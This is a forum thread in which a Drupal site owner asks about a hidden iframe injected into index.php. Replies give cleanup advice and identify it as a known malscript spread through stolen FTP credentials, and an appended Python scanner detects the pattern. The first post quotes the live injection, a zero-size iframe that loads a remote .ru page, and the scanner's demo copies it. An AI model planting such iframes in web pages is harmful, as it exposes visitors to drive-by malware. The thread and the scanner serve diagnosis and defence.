By korsansozluk on
Hi,
On my Drupal site I see code like this in index.php.
I wonder whether this is a trojan. Is there a chance we have picked up a trojan?
<iframe frameborder="0" onload="if (!this.src){ this.height='0'; this.src='http://worldcardtech.ru:8080/index.php'; this.width='0';}" >1258371361co3</iframe>
my drupal site:
www.sinemaa.com
www.korsansozluk.com
Comments
=-=
Remove the code, change all passwords with regards to FTP and server-side stuff including MySQL.
Check file permissions on index.php.
As far as I can tell, these types of issues are because of lax security on the server more so than an issue with Drupal.
Personally, I'd remove all files and folders where it concerns core and upload all new files and folders. I'd also check my logs against the date of the file to see if it provides any clues into how it was written to or when.
thanks
thanks VeryMisunderstood
from what I did.
This is a known malscript and
This is a known malscript and it usually starts by using stolen FTP credentials.
I blogged about it here: http://www.wewatchyourwebsite.com/wordpress/?p=278
If you don't find the remote control code, your site will be attacked repeatedly.
Let me know if you need help cleaning this.
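
The checks suggested in the replies, as an added example that is not part of the original thread: a Python scan of a web root for hidden iframes shaped like the one in the first post, reporting each hit's modification time (to compare with FTP and web server logs) and its file permissions. The function names, the extension list and the sample files are assumptions made for this example; the regex is a heuristic for this one pattern and does not locate a separate backdoor.

```python
import os, re, stat, tempfile
from datetime import datetime, timezone

# Heuristic modelled on the snippet in the first post: an <iframe> whose
# inline onload handler assigns this.src to a remote URL.
IFRAME_RE = re.compile(
    rb"<iframe\b[^>]*?\bonload\s*=[^>]*?this\.src\s*=\s*[\"'](https?://[^\"'\s]+)",
    re.IGNORECASE,
)
SCAN_EXT = (".php", ".inc", ".html", ".htm", ".js", ".tpl")  # assumed list

def scan_tree(root):
    """Return one finding per file under root that contains the pattern."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(f for f in files if f.lower().endswith(SCAN_EXT)):
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    data = fh.read()
                st = os.stat(path)
            except OSError:
                continue  # unreadable file: skip it rather than abort the scan
            urls = sorted({m.group(1).decode("latin-1") for m in IFRAME_RE.finditer(data)})
            if urls:
                findings.append({
                    "path": path, "urls": urls,
                    # mtime is the timestamp to compare with FTP and web logs
                    "modified_utc": datetime.fromtimestamp(st.st_mtime, timezone.utc).isoformat(),
                    "mode": oct(stat.S_IMODE(st.st_mode)),
                    "world_writable": bool(st.st_mode & stat.S_IWOTH),
                })
    return findings

def demo():
    """Scan a throwaway web root holding constructed sample files."""
    root = tempfile.mkdtemp()
    bad = ("<?php /* constructed sample */ ?>\n<iframe frameborder=\"0\" onload=\"if "
           "(!this.src){ this.height='0'; this.src='http://injected.example.invalid:8080/"
           "index.php'; this.width='0';}\" >x</iframe>\n")
    for name, body, mode in (("index.php", bad, 0o666), ("update.php", "<?php ?>\n", 0o644)):
        path = os.path.join(root, name)
        with open(path, "w") as fh:
            fh.write(body)
        os.chmod(path, mode)
    return scan_tree(root)

if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Pointing `scan_tree()` at the real document root lists every file carrying the injection, so none is missed when restoring clean copies.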